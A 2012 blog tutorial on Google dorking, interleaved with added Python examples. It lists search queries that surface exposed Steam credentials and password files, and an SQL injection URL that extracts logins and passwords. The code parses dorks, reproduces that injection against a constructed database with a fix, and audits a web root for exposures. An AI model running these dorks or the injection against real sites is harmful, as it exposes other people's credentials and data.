
2/06/2012

Google Hacking - The Art of the Hacker Search

Hello friends,
After a while without posting anything, I really wanted to teach this technique of searching with Google.
GH, or Google Hacking, is used in nearly every area of hacking and pen-testing. With it we find vulnerable sites and applications.
Databases:
As you read this, countless websites and web pages are being put online; most have vulnerabilities, and those can be found easily with search engines.
The best-known sites that list the dorks are:
IHS - http://www.hackersforcharity.org/ghdb/
Exploit-DB - http://www.exploit-db.com/google-dorks/

Looking Dorks:

Dorks are the famous "queries" that make the search engine return results which, seen through a hacker's eyes, are likely to be vulnerable sites.
Once inside the database, we see categories such as:
  • Files containing usernames
  • Sensitive Directories
  • Vulnerable Files
  • Among other
Let's say we want to find usernames, so I'll open Files containing usernames.
There we find something that interests us, such as this entry:
"This will search for Steam (www.steampowered.com) usernames and passwords taken from the SteamApp.cfg file."
Below the description we see the dork for Google Search:
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
Type this into Google and it should return hundreds of Steam user names, but we can use Google for much more than that.

Dorks in Pen-tests:

Let's analyze another case.
We have to run a pen-test on a site, and we want to find useful information, but only about that site.
Google gives us the "site:" filter for exactly this (and "allinurl:" when every term must appear in the URL).
If we want to know the status of the Apache server, we enter the dork intitle:"Apache Status" "Apache Server Status for" site:www.site.com
which returns the indexed server-status pages for that site, if any exist.

We have numerous things to look for, such as:
Database files:
filetype:xls +inurl:site.com
Passwords:
inurl:/cgi-bin/pass.txt site:site.com
filetype:ini "[FFFTP]" (pass|passwd|password|pwd) site:site.com
"Parent directory" +proftpdpasswd site:site.com
We have shown that Google helps us find information on a given site, but what about when we do not have a defined target?
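As an added example, not code from the original post: a small Python helper that parses dork syntax (operators, quoted phrases, "-" exclusions, (a|b) groups), repairs the "op: value" spacing that copy/paste introduces, scopes any dork to a target with site:, and builds the Google search URL for it. The dork list is taken from this page; the target domain example.com and the operator set are assumptions.

```python
import re
from urllib.parse import urlencode

# Operators used on this page (assumption: a subset of what Google accepts).
OPERATORS = {"site", "inurl", "allinurl", "intitle", "allintitle",
             "intext", "allintext", "filetype", "ext"}

# One token: optional -/+ prefix, optional operator:, then a "phrase",
# an (a|b) alternation group, or a bare word.
TOKEN_RE = re.compile(
    r'(?P<sign>[-+])?'
    r'(?:(?P<op>[a-z]+):)?'
    r'(?P<val>"[^"]*"|\([^)]*\)|\S+)'
)
SPACED_OP_RE = re.compile(r'\b(' + '|'.join(sorted(OPERATORS)) + r'):\s+')


def normalize_dork(dork):
    """Undo the 'op: value' spacing that copy/paste often introduces."""
    return SPACED_OP_RE.sub(r'\1:', dork.strip())


def parse_dork(dork):
    """Return a list of (sign, operator, value) triples; sign is '', '-' or '+'."""
    tokens = []
    for m in TOKEN_RE.finditer(normalize_dork(dork)):
        op, val = m.group("op"), m.group("val")
        if op and op not in OPERATORS:
            # An unknown prefix such as 'http:' is part of a plain term.
            op, val = None, f"{op}:{val}"
        tokens.append((m.group("sign") or "", op, val))
    return tokens


def render(tokens):
    """Rebuild the dork string from parsed tokens."""
    return " ".join(f"{sign}{op + ':' if op else ''}{val}" for sign, op, val in tokens)


def scope_to_site(dork, domain):
    """Restrict a dork to one target: rewrite an existing site: term or add one."""
    tokens = parse_dork(dork)
    scoped = [(s, op, domain if op == "site" else v) for s, op, v in tokens]
    if not any(op == "site" for _, op, _ in tokens):
        scoped.append(("", "site", domain))
    return render(scoped)


def search_url(dork):
    """Google search URL for a dork (the q= parameter is URL-encoded)."""
    return "https://www.google.com/search?" + urlencode({"q": dork})


# The dorks quoted in this post, with the copy/paste spacing removed.
PAGE_DORKS = {
    "Steam credentials": 'intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"',
    "Apache server-status": 'intitle:"Apache Status" "Apache Server Status for"',
    "Spreadsheets": 'filetype:xls',
    "cgi-bin password file": 'inurl:/cgi-bin/pass.txt',
    "FFFTP ini passwords": 'filetype:ini "[FFFTP]" (pass|passwd|password|pwd)',
    "proftpd password listing": '"Parent directory" +proftpdpasswd',
}

if __name__ == "__main__":
    target = "example.com"   # assumption: stand-in for the site under test
    for name, dork in PAGE_DORKS.items():
        scoped = scope_to_site(dork, target)
        print(f"{name}:\n  {scoped}\n  {search_url(scoped)}")
```

Running the script prints each dork scoped to the target and the URL you would open; the parser is what lets you rewrite an existing site: term instead of blindly appending a second one.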

Dorks for defacers and Crackers:

Yes, 99% of defacers and crackers use Google!
Why? A site that wants visitors has to be findable, and a web programmer who is not stupid uses the search engines to promote the site and rank high. That same indexing serves the attacker.
Something common on the Internet is to research a particular issue, land on a forum, and read a description like this:

For example:
www.linkdosite.com/pag_show_this.php?looknews=1 is vulnerable to SQL injection and can be exploited like this:
www.linkdosite.com/pag_show_this.php?looknews=-1+union+all+select+1,login,password,3,4,5+from+users
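The injection above, worked through as an added example (not from the original post) against a constructed SQLite database. The post shows only the URL, so the table and column names are assumptions: a news table with six columns, which is why the payload supplies six values. The vulnerable handler pastes ?looknews= into the SQL text, the UNION appends one row per user with login in the title column and password in the body column, and the fixed handler rejects anything that is not an integer and binds the value as a parameter.

```python
import sqlite3
from urllib.parse import parse_qs, urlparse


def build_sample_db():
    """Constructed in-memory stand-in for the news site in the post.
    Table and column names are assumptions; the post shows only the URL."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT,
                          author TEXT, posted TEXT, views INTEGER);
        CREATE TABLE users(login TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post', 'admin', '2012-02-06', 10);
        INSERT INTO users VALUES ('admin', 's3cret'), ('editor', 'hunter2');
    """)
    return con


def param_from_url(url, name):
    """Extract one query parameter the way the web server would ('+' becomes space)."""
    return parse_qs(urlparse(url).query)[name][0]


def show_news_vulnerable(con, looknews):
    """The bug: the untrusted ?looknews= value is pasted into the SQL text,
    so '-1 union all select ...' becomes part of the query."""
    sql = ("SELECT id, title, body, author, posted, views FROM news "
           f"WHERE id={looknews}")
    return con.execute(sql).fetchall()


def show_news_fixed(con, looknews):
    """The fix: accept only an integer and bind it as a parameter."""
    news_id = int(looknews)          # raises ValueError on the injection string
    sql = ("SELECT id, title, body, author, posted, views FROM news "
           "WHERE id=?")
    return con.execute(sql, (news_id,)).fetchall()


# The exploit URL quoted in the post.
EXPLOIT_URL = ("http://www.linkdosite.com/pag_show_this.php"
               "?looknews=-1+union+all+select+1,login,password,3,4,5+from+users")


def leaked_credentials(con, url=EXPLOIT_URL):
    """Run the URL's payload through the vulnerable handler and pull the
    (login, password) pairs out of the columns the UNION put them in."""
    rows = show_news_vulnerable(con, param_from_url(url, "looknews"))
    return [(row[1], row[2]) for row in rows]


if __name__ == "__main__":
    db = build_sample_db()
    print("vulnerable handler leaks:", leaked_credentials(db))
    try:
        show_news_fixed(db, param_from_url(EXPLOIT_URL, "looknews"))
    except ValueError as exc:
        print("fixed handler rejects the payload:", exc)
```

The id=-1 part matters: it makes the legitimate half of the UNION return nothing, so the page renders only the attacker's rows, with credentials sitting where the title and body would normally be.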

How do I protect?

Google and other search engines should never be seen as something bad or destructive. They are just doing their job: helping people find your site. If they did not, your site would not be found and would not have many visitors.
Still, you can limit what gets searched. For example, ask Google not to index the "/login/" directory with a robots.txt file, a plain text file listing the paths crawlers should not visit. Keep in mind that robots.txt is itself public and is only a request: anything that must stay hidden needs authentication or removal from the web root, not just a Disallow line.
The other tips are the same as always: keep your site updated and, preferably, have it pen-tested.
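An added example (not from the post) of the self-audit this advice implies: run the same checks the page's dorks perform, but locally against the document root before Google indexes it, and list what a public robots.txt would disclose to anyone who fetches it. The sample web root is constructed in a temporary directory; its file names and contents, and the check patterns distilled from the dorks, are assumptions.

```python
import os
import re
import tempfile

# Local equivalents of the dorks quoted on this page: (reason, predicate).
# The predicate gets the lower-cased relative path and the file's text.
# Assumption: these patterns are distilled from the post's dorks, nothing more.
PASSWORD_WORD = re.compile(r"\b(pass|passwd|password|pwd)\b", re.I)
CHECKS = [
    ("Steam credentials (SteamApp.cfg)",
     lambda path, text: path.endswith("steamapp.cfg") or "SteamUserPassphrase=" in text),
    ("password file under cgi-bin",
     lambda path, text: path.endswith("cgi-bin/pass.txt")),
    ("FFFTP .ini with a stored password",
     lambda path, text: path.endswith(".ini") and "[FFFTP]" in text
     and PASSWORD_WORD.search(text) is not None),
    ("proftpd password file in a directory listing",
     lambda path, text: "proftpdpasswd" in os.path.basename(path)),
    ("spreadsheet exposed under the web root",
     lambda path, text: path.endswith(".xls")),
]


def audit_webroot(root):
    """Walk a document root; return sorted (relative path, reason) pairs for
    every file one of the page's dorks would surface once it is indexed."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, "r", errors="replace") as fh:
                    text = fh.read(64 * 1024)   # config/password files are small
            except OSError:
                continue
            for reason, matches in CHECKS:
                if matches(rel.lower(), text):
                    findings.append((rel, reason))
    return sorted(findings)


def disallowed_paths(robots_txt):
    """robots.txt is fetched by anyone: every Disallow line is a hint to an
    attacker about where the interesting directories are."""
    return [line.split(":", 1)[1].strip()
            for line in robots_txt.splitlines()
            if line.strip().lower().startswith("disallow:")]


def build_sample_webroot():
    """Constructed web root with the kinds of files the dorks find (all fake)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.html": "<html>clean page</html>",
        "robots.txt": "User-agent: *\nDisallow: /login/\nDisallow: /admin/\n",
        "cgi-bin/pass.txt": "admin:letmein\n",
        "ftp/settings.ini": "[FFFTP]\nHost=ftp.site.com\nPassword=hunter2\n",
        "backup/proftpdpasswd": "ftpuser:$1$fakehash\n",
        "reports/sales.xls": "constructed placeholder, not a real spreadsheet",
        "config/SteamApp.cfg": "SteamAppUser=player\nSteamUserPassphrase=secret\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, reason in audit_webroot(root):
        print(f"{rel}: {reason}")
    with open(os.path.join(root, "robots.txt")) as fh:
        print("robots.txt discloses:", disallowed_paths(fh.read()))
```

Point audit_webroot at a real document root to see what a crawler would pick up; everything it reports should be moved out of the web root or put behind authentication, since a Disallow line only asks well-behaved crawlers to stay away and tells everyone else where to look.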

About Author:

Hi, it's me, Aamir Khan, owner of HACKING ARTICLES. I am an Ethical Hacker, Pro Blogger, addicted Web Developer and Security Researcher with experience in various aspects of Information Security. I am from Pakistan. Hacking is my passion and I want to be called a LEGEND in this field.

Follow him @ Twitter | Facebook

